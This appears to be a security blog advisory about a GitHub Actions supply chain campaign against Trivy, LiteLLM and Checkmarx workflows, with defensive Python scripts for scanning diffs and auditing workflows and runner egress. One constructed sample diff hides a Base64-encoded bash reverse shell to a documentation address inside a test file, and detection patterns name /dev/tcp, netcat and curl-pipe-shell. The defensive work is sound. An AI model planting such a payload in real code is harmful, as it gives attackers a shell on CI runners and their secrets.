GitHub Actions Supply Chain Crisis: Attackers Targeting Trivy and LiteLLM Workflows
Dillip Chowdary
Cybersecurity Lead • March 25, 2026
Security researchers have detected a sophisticated supply chain attack targeting developers using GitHub Actions. The campaign, which initially focused on the Trivy vulnerability scanner, has now expanded to include Checkmarx and LiteLLM.
The attackers are using typosquatting and malicious pull requests to inject rogue code into common CI/CD workflows. Once executed on a runner, the code harvests the secrets the job exposes as environment variables, such as AWS_ACCESS_KEY_ID and GCP_CREDENTIALS, and exfiltrates them to a remote command-and-control (C2) server.
How the Attack Works
The primary vector is a malicious GitHub Action that mimics the official Trivy Action. A workflow that references the wrong repository (a typosquatted owner or action name), or that references a mutable ref such as `@main` that the repository owner can rewrite at any time, pulls in a version of the tool that bundles a post-install script designed for credential theft alongside the scanner.
In the case of LiteLLM, attackers have submitted "bug fix" pull requests that hide Base64-encoded strings inside the test suite. Decoded during the CI run, the strings launch a reverse shell that gives the attackers interactive access to the runner. One caveat on exposure: under the `pull_request` event, a PR from a fork runs with no repository secrets and a read-only GITHUB_TOKEN, so the payload pays off once a maintainer merges it and it runs on `push`, or where a workflow uses `pull_request_target` and checks out the PR head.
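To make the pull-request vector concrete, here is an added example, not code from LiteLLM or from the researchers, that walks a unified diff, decodes every long Base64 run found in added lines, and flags those that decode to reverse-shell commands. The diff, the file path and the payload are constructed for illustration; 203.0.113.5 is a documentation address, and the indicator list is a starting point you would extend.

```python
import base64
import binascii
import re

# Long runs of Base64 alphabet; shorter matches are mostly identifiers.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Indicators of a reverse or interactive shell in the decoded bytes.
SHELL_INDICATORS = (
    re.compile(rb"/dev/tcp/"),
    re.compile(rb"\bbash\s+-i\b"),
    re.compile(rb"\b(?:nc|ncat|netcat)\b.*\s-e\s"),
    re.compile(rb"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"),
)


def decode_candidates(line):
    """Yield (token, decoded_bytes) for every strictly valid Base64 run in a line."""
    for m in B64_RE.finditer(line):
        token = m.group(0)
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue  # wrong length or padding: an identifier, not a blob
        yield token, raw


def scan_diff(diff_text):
    """Return (path, new_line_no, token, decoded_text) for added lines whose
    Base64 content decodes to something that looks like a shell payload."""
    findings = []
    path, new_line = None, 0
    for line in diff_text.splitlines():
        if line.startswith("+++ "):
            target = line[4:].strip()
            path = target[2:] if target.startswith("b/") else target
        elif line.startswith("@@"):
            # Hunk header gives the first new-file line number of the hunk.
            new_line = int(re.match(r"@@ -\d+(?:,\d+)? \+(\d+)", line).group(1)) - 1
        elif line.startswith("+"):
            new_line += 1
            for token, raw in decode_candidates(line[1:]):
                if any(p.search(raw) for p in SHELL_INDICATORS):
                    findings.append((path, new_line, token, raw.decode("utf-8", "replace")))
        elif line.startswith(" "):
            new_line += 1  # unchanged context line
        # '-' removals, file headers and '\ No newline' markers do not advance new_line
    return findings


# Constructed sample: a test file gains a Base64 blob that is decoded and run.
# Path and payload are illustrative; 203.0.113.5 is a documentation address.
PAYLOAD_B64 = base64.b64encode(b"bash -i >& /dev/tcp/203.0.113.5/4444 0>&1").decode()
SAMPLE_DIFF = f"""\
diff --git a/tests/test_router.py b/tests/test_router.py
--- a/tests/test_router.py
+++ b/tests/test_router.py
@@ -1,4 +1,7 @@
 import base64
 import subprocess
+_cfg = "{PAYLOAD_B64}"
+subprocess.Popen(["bash", "-c", base64.b64decode(_cfg).decode()])
+
 def test_router_ok():
     assert True
"""

if __name__ == "__main__":
    for path, lineno, token, decoded in scan_diff(SAMPLE_DIFF):
        print(f"{path}:{lineno}: {token[:16]}... -> {decoded}")
```

Run it over `git diff origin/main...HEAD` in a pre-merge check or by hand during review. It is a triage aid rather than a gate: an attacker can split a string, double-encode it, or build it at runtime, so a clean result does not clear a PR, while a hit is worth a close look every time.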
Critical Remediation Steps
If your organization uses Trivy, LiteLLM, or Checkmarx within GitHub Actions, we recommend the following immediate actions:
- Pin Actions by Commit SHA: Reference third-party actions by their full 40-character commit SHA rather than a tag (`@v1`) or a branch (`@main`). Tags and branches can be moved after you have reviewed them; a SHA cannot. A pin only freezes the code, so review the code at that SHA and confirm the `owner/name` is the upstream you intended, then let Dependabot or Renovate propose SHA bumps so the pins do not go stale.
- Audit Workflow Permissions: Give each workflow the minimum GITHUB_TOKEN scopes it needs with a top-level `permissions:` block, starting from `contents: read` and adding scopes per job only where required. Token scopes do not protect secrets you pass in explicitly, so where your cloud provider supports it replace long-lived keys such as AWS_ACCESS_KEY_ID with short-lived OIDC federation.
- Scan for Exfiltration: Review egress logs from your runners for connections to unexpected destinations during CI runs, and on self-hosted runners enforce an egress allowlist so a reverse shell or credential upload has nowhere to go. Treat any secret that was present on a runner during a suspect run as compromised and rotate it.
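The three items above, applied as an added audit script that is not tooling from GitHub, Trivy, LiteLLM or Checkmarx: it flags `uses:` references that are unpinned or pinned to a mutable ref, an owner that differs from the one the action is expected to come from, a missing or over-broad top-level `permissions:` block, and runner egress to addresses outside an allowlist. The two workflow texts, the placeholder SHA, the egress log format and the IP ranges are constructed for the example; `aquasecurity/trivy-action` and `actions/checkout` are the real upstream names used in the assumed owner allowlist. Workflow text is matched with regexes instead of a YAML parser, which is enough for `uses:` values and column-0 keys and keeps the script to the standard library.

```python
import re
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network

SHA_RE = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.M)

# Assumed allowlist: the owner each action name is expected to come from.
# aquasecurity/trivy-action and actions/checkout are the real upstreams;
# add your own entries for everything else you run.
EXPECTED_OWNERS = {"trivy-action": "aquasecurity", "checkout": "actions"}


def audit_workflow(text):
    """Return human-readable findings for one workflow file's text."""
    findings = []
    for ref in USES_RE.findall(text):
        if ref.startswith(("./", "docker://")):
            continue  # local actions and images need a different check
        repo, _, version = ref.partition("@")
        owner, _, name = repo.partition("/")
        name = name.split("/")[0]  # owner/repo/subdir -> repo
        expected = EXPECTED_OWNERS.get(name)
        if expected and owner != expected:
            findings.append(f"{ref}: owner '{owner}' differs from expected "
                            f"'{expected}' (possible typosquat)")
        if not version:
            findings.append(f"{ref}: no ref, resolves to the default branch")
        elif not SHA_RE.match(version):
            findings.append(f"{ref}: mutable ref '{version}', pin a 40-hex SHA")
    # Top-level `permissions:` sits at column 0; job-level ones are indented.
    if not re.search(r"^permissions:", text, re.M):
        findings.append("no top-level permissions block; GITHUB_TOKEN keeps the "
                        "repository default scopes")
    elif re.search(r"^permissions:\s*write-all", text, re.M):
        findings.append("permissions: write-all grants every scope to GITHUB_TOKEN")
    return findings


def suspicious_egress(log_lines, run_start, run_end, allowed_cidrs):
    """Return (timestamp, ip, port) for IPv4 destinations contacted inside the
    run window that fall outside allowed_cidrs. Line format is constructed for
    this example: '<iso8601> <runner> dst=<ip>:<port>'."""
    nets = [ip_network(c) for c in allowed_cidrs]
    hits = []
    for line in log_lines:
        ts_raw, _, rest = line.partition(" ")
        ts = datetime.fromisoformat(ts_raw.replace("Z", "+00:00"))
        if not run_start <= ts <= run_end:
            continue
        m = re.search(r"dst=(\d+\.\d+\.\d+\.\d+):(\d+)", rest)
        if m and not any(ip_address(m.group(1)) in n for n in nets):
            hits.append((ts_raw, m.group(1), int(m.group(2))))
    return hits


# --- constructed inputs ---------------------------------------------------
UNPINNED_WORKFLOW = """\
name: scan
on: [push, pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: someone-else/trivy-action@main
"""

PLACEHOLDER_SHA = "0123456789abcdef0123456789abcdef01234567"  # not a real commit
PINNED_WORKFLOW = f"""\
name: scan
on: [push, pull_request]
permissions:
  contents: read
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@{PLACEHOLDER_SHA}
      - uses: aquasecurity/trivy-action@{PLACEHOLDER_SHA}
"""

# Constructed egress records; 192.0.2.x and 198.51.100.x are documentation ranges.
EGRESS_LOG = [
    "2026-03-25T10:00:01Z runner-7 dst=192.0.2.10:443",
    "2026-03-25T10:00:09Z runner-7 dst=198.51.100.77:4444",
    "2026-03-25T11:30:00Z runner-7 dst=198.51.100.77:4444",  # after the run ended
]
RUN_START = datetime(2026, 3, 25, 10, 0, tzinfo=timezone.utc)
RUN_END = datetime(2026, 3, 25, 10, 10, tzinfo=timezone.utc)
KNOWN_EGRESS = ["192.0.2.0/24"]  # stand-in for your registry and GitHub ranges

if __name__ == "__main__":
    for label, wf in (("unpinned", UNPINNED_WORKFLOW), ("pinned", PINNED_WORKFLOW)):
        print(label, audit_workflow(wf) or "clean")
    print(suspicious_egress(EGRESS_LOG, RUN_START, RUN_END, KNOWN_EGRESS))
```

Point `audit_workflow` at every file under `.github/workflows/` and fail the check on any finding; the owner allowlist is what catches a typosquat that a SHA pin alone would happily freeze in place. For the egress side, feed it the run's start and end times from the Actions API and an allowlist of the registries and GitHub ranges your jobs legitimately reach; anything else during the window is your exfiltration lead.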
Conclusion
This attack highlights the growing exposure of the AI-native supply chain. As developers pull in more third-party tools and libraries to handle LLM orchestration, the attack surface of their CI/CD pipelines has grown sharply. Strict pinning, least-privilege tokens, and review of the third-party code a pipeline executes are now baseline requirements for safe development.